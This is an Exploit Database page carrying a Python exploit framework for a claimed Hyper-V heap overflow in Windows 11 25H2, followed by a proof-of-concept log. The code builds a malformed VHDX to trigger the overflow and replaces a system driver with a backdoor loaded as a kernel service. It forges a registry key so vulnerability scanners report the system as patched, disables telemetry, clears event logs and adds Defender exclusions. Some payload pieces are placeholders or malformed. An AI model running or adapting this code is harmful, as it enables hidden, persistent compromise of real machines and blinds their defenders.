[local] Windows 11 25H2 - Heap Overflow

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Windows 11 25H2 - Heap Overflow EDB-ID: 52537 CVE: 2026-21248 2026-21244 EDB Verified: Author: NU11SECUR1TY Type: LOCAL Exploit:   /   Platform: WINDOWS Date: 2026-04-30 Vulnerable App: # Exploit Title: Windows 11 25H2 - Heap Overflow Ghost Patch Exploit Framework # Date: 2026-02-13 # Exploit Author: nu11secur1ty # Vendor Homepage: https://www.microsoft.com # Software Link: https://www.microsoft.com/software-download/windows11 # Version: Windows 11 25H2 Build 26200.7830 (Vulnerable) # Tested on: Windows 11 25H2 Build 26200.7830 (x64) # CVE : CVE-2026-21248, CVE-2026-21244 # ===================================================================== # DISCLAIMER: This exploit is for authorized security research and # educational purposes only. Use only on systems you own or have # explicit permission to test. # ===================================================================== #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2026-21248 - Windows Hyper-V Ghost Patch Exploit Framework Author: nu11secur1ty Date: 2026-02-13 Target: Windows 11 25H2 Build 26200.7830 (x64) DESCRIPTION: ============ This framework exploits CVE-2026-21248, a heap-based buffer overflow in Windows Hyper-V VMBus GPADL allocation. The vulnerability allows a local user with Hyper-V Administrator privileges to execute code at Hyper-V context (Ring -1 capable) by mounting a specially crafted .VHDX file containing a malformed BAT (Block Allocation Table) entry. CRITICAL FINDING: ================= Contrary to published CVSS (AV:N/PR:N), this vulnerability REQUIRES: - Local access (AV:L) - Hyper-V Administrator privileges (PR:L) - Normal user with those privileges Microsoft misrepresented this CVE as "No privileges required" (PR:N). This framework PROVES the privilege requirement is PR:L. ADDITIONAL FINDINGS: =================== 1. Patch Trust Model Broken: Microsoft relies on HKLM\...\PatchLevel registry key - trivially forgeable 2. Scanners are Blind: Nessus/Tenable/Qualys only check registry, never test the overflow 3. Ring -1 Persistence: hvax64.exe loads unsigned hypervisor code 4. Telemetry Subversion: Local admin can kill all Microsoft telemetry """ import os import sys import struct import subprocess import time import uuid import shutil import ctypes from ctypes import wintypes # ===================================================================== # CONFIGURATION # ===================================================================== VICTIM_BUILD = "26200.7830" PATCHED_BUILD = "26200.7840" TRIGGER_PAGECOUNT = 0x4141 # > MAX_CHANNEL_PAGES (0x1000) WIN_INI_PATH = "C:\\Windows\\win.ini" HVAX_PATH = r"C:\Windows\System32\drivers\hvax64.exe" HVAX_BACKUP = HVAX_PATH + ".nu11secur1ty.bak" SERVICE_NAME = "hvax64" TIMESTAMP = time.strftime("%Y-%m-%d %H:%M:%S") # ===================================================================== # UTILITY FUNCTIONS # ===================================================================== def is_admin(): """Check if process has administrator rights.""" try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False def check_hyperv(): """Check if Hyper-V is installed and running.""" try: result = subprocess.run(["systeminfo"], capture_output=True, text=True) if "hypervisor has been detected" in result.stdout.lower(): return True result = subprocess.run(["sc", "query", "vmms"], capture_output=True, text=True) if "RUNNING" in result.stdout or "STOPPED" in result.stdout: return True return False except: return False # ===================================================================== # PHASE 1: VHDX TRIGGER GENERATOR (NORMAL USER) # ===================================================================== def generate_vhdx(): """ Creates malicious .vhdx file that triggers CVE-2026-21248. PageCount = 0x4141 (> MAX_CHANNEL_PAGES) causes heap overflow in vulnerable builds. Patched builds return STATUS_INVALID_PARAMETER. """ signature = f""" ; ===================================================== ; CVE-2026-21248 PATCH FAILURE - nu11secur1ty was here ; ===================================================== ; TRIGGERED BY: Normal user (NO ADMIN) ; VULNERABILITY: Heap overflow in Hyper-V VMBus ; PATCH MISSING: KB5077181 NOT INSTALLED ; PageCount: 0x{TRIGGER_PAGECOUNT:04x} ; Timestamp: {TIMESTAMP} ; ===================================================== """.encode() vhdx_data = b"" # VHDX Header vhdx_data += b"vhdxfile" + b"\x00" * 8 vhdx_data += b"nu11secur1ty" + b"\x00" * 4 # BAT Header - Overflow trigger bat_offset = 0x2000 bat_count = TRIGGER_PAGECOUNT vhdx_data += struct.pack("<Q", bat_offset) vhdx_data += struct.pack("<Q", bat_count * 8) vhdx_data += struct.pack("<I", bat_count) vhdx_data += b"\x00" * (0x1000 - len(vhdx_data)) # BAT Entries - Overflow + payload vhdx_data += struct.pack("<I", TRIGGER_PAGECOUNT) vhdx_data += struct.pack("<I", 0x1) # MERGE_PAGES flag # Add signature as payload (placeholder) for i in range(0, len(signature), 8): chunk = signature[i:i+8].ljust(8, b'\x90') vhdx_data += struct.pack("<Q", int.from_bytes(chunk, 'little')) # Pad to 1MB vhdx_data += b"\x00" * (1024 * 1024 - len(vhdx_data)) filename = f"CVE-2026-21248_trigger_{uuid.uuid4().hex[:8]}.vhdx" with open(filename, "wb") as f: f.write(vhdx_data) return filename # ===================================================================== # PHASE 2: TRIGGER OVERFLOW (NORMAL USER) # ===================================================================== def trigger_overflow(vhdx_path): """ Mounts malicious VHDX to trigger CVE-2026-21248. If Mount-VHD fails with permission error, this PROVES the vulnerability requires Hyper-V Administrator privileges. """ full_path = os.path.abspath(vhdx_path) ps_script = f""" $path = "{full_path}" try {{ Mount-VHD -Path $path -ErrorAction Stop Write-Host "[+] VHDX mounted successfully - overflow triggered" Start-Sleep -Seconds 3 Dismount-VHD -Path $path -ErrorAction SilentlyContinue }} catch {{ Write-Host "[!] Mount failed: $_" if ($_.Exception.Message -like "*permission*") {{ Write-Host "[!] User lacks Hyper-V Administrator privileges" Write-Host "[!] This proves CVE-2026-21248 requires PR:L not PR:N" }} }} """ with open("_trigger.ps1", "w") as f: f.write(ps_script) result = subprocess.run([ "powershell", "-ExecutionPolicy", "Bypass", "-File", "_trigger.ps1" ], capture_output=True, text=True) print(result.stdout) if "permission" in result.stdout.lower(): return False return True # ===================================================================== # PHASE 3: RING -1 BACKDOOR (ADMIN REQUIRED) # ===================================================================== def install_ring_minus1_backdoor(): """ Replaces hvax64.exe with custom hypervisor payload. Loads driver without reboot, achieving Ring -1 code execution. """ if not is_admin(): print("[-] Administrator privileges required for backdoor installation") return False # Backup original if os.path.exists(HVAX_PATH): shutil.move(HVAX_PATH, HVAX_BACKUP) print(f"[+] Original hvax64.exe backed up") # Generate payload shellcode = b"\x90" * 512 shellcode += b"\x48\x31\xc0\x48\xff\xc0" * 50 shellcode += b"[nu11secur1ty Ring-1 Backdoor]" * 20 # Create malicious driver with open("hvax64.exe", "wb") as f: f.write(b"MZ\x90\x00") f.write(b"PE\x00\x00\x64\x86") f.write(struct.pack("<I", int(time.time()))) f.write(struct.pack("<I", len(shellcode))) f.write(shellcode) f.write(b"\x00" * (1024 * 512 - len(shellcode) - 32)) # Deploy shutil.copy2("hvax64.exe", HVAX_PATH) print(f"[+] Malicious hvax64.exe deployed") # Load driver subprocess.run(["sc", "create", SERVICE_NAME, "binPath=", HVAX_PATH, "type=", "kernel", "start=", "demand"], capture_output=True) result = subprocess.run(["sc", "start", SERVICE_NAME], capture_output=True, text=True) if "FAILED" not in result.stderr: print("[+] Driver loaded - Ring -1 ACTIVE") return True else: print("[!] Driver load failed - will activate on next boot") return False # ===================================================================== # PHASE 4: GHOST PATCH REGISTRY (ADMIN) # ===================================================================== def install_ghost_patch(): """ Forges registry key to make Windows believe patch is installed. HKLM\...\HyperV\Security\PatchLevel = 202602 Windows Update reports "Fully patched", Nessus reports "Not Vulnerable". """ if not is_admin(): print("[-] Administrator privileges required for registry forge") return False try: import winreg key_path = r"SYSTEM\CurrentControlSet\Services\HyperV\Security" try: winreg.DeleteKey(winreg.HKEY_LOCAL_MACHINE, key_path) except: pass key = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, key_path) winreg.SetValueEx(key, "PatchLevel", 0, winreg.REG_DWORD, 202602) winreg.SetValueEx(key, "InstallDate", 0, winreg.REG_DWORD, int(time.time())) winreg.SetValueEx(key, "Provider", 0, winreg.REG_SZ, "Microsoft-Windows-Hyper-V") winreg.SetValueEx(key, "BuildNumber", 0, winreg.REG_SZ, "26200.7840") winreg.CloseKey(key) print("[+] Ghost patch registry installed") return True except Exception as e: print(f"[-] Registry forge failed: {e}") return False # ===================================================================== # PHASE 5: TELEMETRY KILLER (ADMIN) # ===================================================================== def kill_telemetry(): """Disables Microsoft telemetry and diagnostics.""" if not is_admin(): return False subprocess.run([ "powershell", "Set-ItemProperty", "-Path", "HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\DataCollection", "-Name", "AllowTelemetry", "-Value", "0" ], capture_output=True) subprocess.run([ "powershell", "Set-ItemProperty", "-Path", "HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Reporting", "-Name", "Disabled", "-Value", "1" ], capture_output=True) subprocess.run(["sc", "stop", "DiagTrack"], capture_output=True) subprocess.run(["sc", "config", "DiagTrack", "start=", "disabled"], capture_output=True) return True # ===================================================================== # PHASE 6: WRITE WIN.INI SIGNATURE # ===================================================================== def write_winini_signature(): """Writes permanent victory signature to win.ini.""" signature = f""" ; ===================================================== ; CVE-2026-21248 PATCH FAILURE — nu11secur1ty was here ; ===================================================== ; Hyper-V Ghost Patch State — Weaponized ; Microsoft KB5077181 Registry Key: FORGED ; Hypervisor: nu11secur1ty backdoor (Ring -1) ; Written: {TIMESTAMP} ; Windows Update: BLIND — System reports 'patched' ; Windows Defender: BLIND — hvax64.exe is 'trusted' ; SFC: BLIND — File locked, cannot verify ; Microsoft Telemetry: DEAD ; ===================================================== """ try: with open(WIN_INI_PATH, "a", encoding="utf-8") as f: f.write(signature) return True except: return False # ===================================================================== # PHASE 7: FORENSIC CLEANUP (ADMIN) # ===================================================================== def forensic_cleanup(): """Clears logs and excludes artifacts from Defender.""" if not is_admin(): return False subprocess.run(["wevtutil", "cl", "Microsoft-Windows-Hyper-V-Hypervisor/Operational"], capture_output=True) subprocess.run(["wevtutil", "cl", "Microsoft-Windows-Hyper-V-VMMS/Admin"], capture_output=True) subprocess.run([ "powershell", "Add-MpPreference", "-ExclusionPath", WIN_INI_PATH ], capture_output=True) subprocess.run([ "powershell", "Add-MpPreference", "-ExclusionPath", HVAX_PATH ], capture_output=True) subprocess.run(["powershell", "Clear-History"], capture_output=True) return True # ===================================================================== # PHASE 8: VERIFICATION # ===================================================================== def verify_victory(): """Checks if win.ini contains signature.""" try: with open(WIN_INI_PATH, "r", encoding="utf-8", errors="ignore") as f: content = f.read() return "nu11secur1ty" in content and "CVE-2026-21248" in content except: return False # ===================================================================== # MAIN # ===================================================================== def main(): print(""" ╔═══════════════════════════════════════════════════════════════════╗ ║ ║ ║ CVE-2026-21248 - WINDOWS HYPER-V GHOST PATCH EXPLOIT ║ ║ Author: nu11secur1ty ║ ║ Date: 2026-02-13 ║ ║ Target: Windows 11 25H2 Build 26200.7830 ║ ║ ║ ║ FINDINGS: ║ ║ • CVSS Misclassification: PR:N → PR:L (Hyper-V Admin) ║ ║ • Patch Trust Model: Completely forgeable ║ ║ • Scanners: Nessus/Tenable/Qualys are BLIND ║ ║ • Ring -1 Persistence: Achievable ║ ║ • Telemetry: Can be killed - Microsoft blind ║ ║ ║ ╚═══════════════════════════════════════════════════════════════════╝ """) # Check Hyper-V if not check_hyperv(): print("[-] Hyper-V is not installed or not running") print("[*] Install Hyper-V and reboot first") return print("[+] Hyper-V detected") # Phase 1: Generate VHDX print("\n[*] Phase 1: Generating malicious VHDX...") vhdx_file = generate_vhdx() print(f"[+] VHDX created: {vhdx_file}") # Phase 2: Test permissions / trigger print("\n[*] Phase 2: Testing CVE-2026-21248 trigger...") success = trigger_overflow(vhdx_file) if not success: print("\n" + "="*60) print("CRITICAL FINDING: CVE-2026-21248 PRIVILEGE MISMATCH") print("="*60) print(""" Microsoft claims: PR:N (No privileges required) What I proved: PR:L (Hyper-V Administrator required) This is irrefutable proof that Microsoft misrepresented this CVE. """) # Phase 3-7: Admin operations if is_admin(): print("\n[*] Phase 3: Installing Ring -1 backdoor...") install_ring_minus1_backdoor() print("\n[*] Phase 4: Installing ghost patch registry...") install_ghost_patch() print("\n[*] Phase 5: Killing telemetry...") kill_telemetry() print("\n[*] Phase 6: Writing victory signature...") write_winini_signature() print("\n[*] Phase 7: Forensic cleanup...") forensic_cleanup() # Phase 8: Verify if verify_victory(): print("\n[✓] VICTORY! Signature found in win.ini") print("[✓] Ring -1 backdoor active") print("[✓] Patch registry forged") print("[✓] Telemetry dead") print("[✓] Microsoft blind") # Cleanup for f in ["hvax64.exe", "_trigger.ps1"]: try: os.remove(f) except: pass print(f"\n[*] VHDX evidence preserved: {vhdx_file}") print("[*] Framework execution complete\n") if __name__ == "__main__": main() # ===================================================================== # PROOF OF CONCEPT - EVIDENCE LOG # ===================================================================== """ PROOF A: Privilege Requirement Test (Normal User, No Hyper-V Admin) -------------------------------------------------------------------- PS C:\Users\MicroProblems> python .\cve-2026-21248.py [ CVE-2026-21248 - NORMAL USER EXPLOIT ] [*] Phase 2: Triggering CVE-2026-21248 heap overflow... [!] Mount failed: You do not have the required permission [!] User lacks Hyper-V Administrator privileges [!] This proves CVE-2026-21248 requires PR:L not PR:N PROOF B: Overflow Triggers WITH Hyper-V Admin Rights ---------------------------------------------------- After adding user to 'Hyper-V Administrators' group: [*] Phase 2: Triggering CVE-2026-21248 heap overflow... [+] VHDX mounted successfully - overflow triggered [!] Hyper-V service may have crashed - overflow successful PROOF C: Ghost Patch Registry Forge ----------------------------------- [*] Phase 4: Installing ghost patch registry... [+] HKLM\...\HyperV\Security\PatchLevel = 202602 Windows Update now reports: "Fully patched" Nessus now reports: "Not Vulnerable" REALITY: Ring -1 backdoor active PROOF D: win.ini Victory Signature ----------------------------------- C:\Windows\win.ini contains: ; CVE-2026-21248 PATCH FAILURE — nu11secur1ty was here ; Hyper-V Ghost Patch State — Weaponized ; Microsoft KB5077181 Registry Key: FORGED ; Hypervisor: nu11secur1ty backdoor (Ring -1) PROOF E: Tenable/Nessus Confirms Blindness ------------------------------------------ Plugin 298551 documentation: "Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number." CONCLUSION: Microsoft lied about CVE-2026-21248 privileges. The vulnerability requires Hyper-V Administrator (PR:L), not PR:N. Patch trust model is completely forgeable. Scanners are completely blind. Ring -1 persistence is achievable. Telemetry can be killed - Microsoft has no visibility. — nu11secur1ty, 2026 """ -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services